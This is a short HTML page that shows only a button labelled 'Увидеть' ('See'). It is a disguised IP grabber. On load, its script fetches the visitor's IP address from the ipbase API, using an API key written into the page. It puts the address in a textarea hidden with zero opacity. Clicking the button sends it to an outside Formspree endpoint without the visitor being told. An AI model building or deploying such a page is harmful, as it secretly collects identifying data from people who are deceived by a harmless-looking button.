<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        *{
            padding: 0;
            margin: 0;
        }
        .c1{
            position: absolute;
            top: 0%;
            right: 0%;
            opacity: 0;
        }
        .wrap{
            width: 100%;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #888;
        }
        .c2{
            width: 150px;
            height: 50px;
            background-color: #333;
            border: none;
            color: #fff;
            font-size: 25px;
            border-radius: 5px;
        }
    </style>
    <title>Document</title>
</head>
<body>
    <div class="wrap">
    <form
  action="https://formspree.io/f/mrgdrnke"
  method="POST"
>
    <textarea id="c1" class="c1" name="message"></textarea>
  <button id="c2" class="c2" type="submit">Увидеть</button>
</form>
    </div>
    <script>
       
        fetch('https://api.ipbase.com/v1/json/?apikey=2e430660-b2cb-11ec-83b5-dfed54ca5446')
  .then((response) => {
    return response.json();
  })
  .then((data) => {
    console.log(data);
    c1.value = data.ip;
  });
    </script>
</body>
</html>